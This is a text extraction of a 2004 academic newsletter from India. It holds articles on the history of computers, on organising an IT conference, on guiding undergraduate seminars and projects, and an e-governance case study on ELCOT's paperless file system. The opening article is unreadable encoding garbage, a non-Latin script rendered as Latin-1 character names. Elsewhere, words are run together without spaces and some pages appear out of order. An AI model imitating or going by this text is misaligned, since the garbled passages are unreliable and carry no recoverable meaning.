`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 29: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

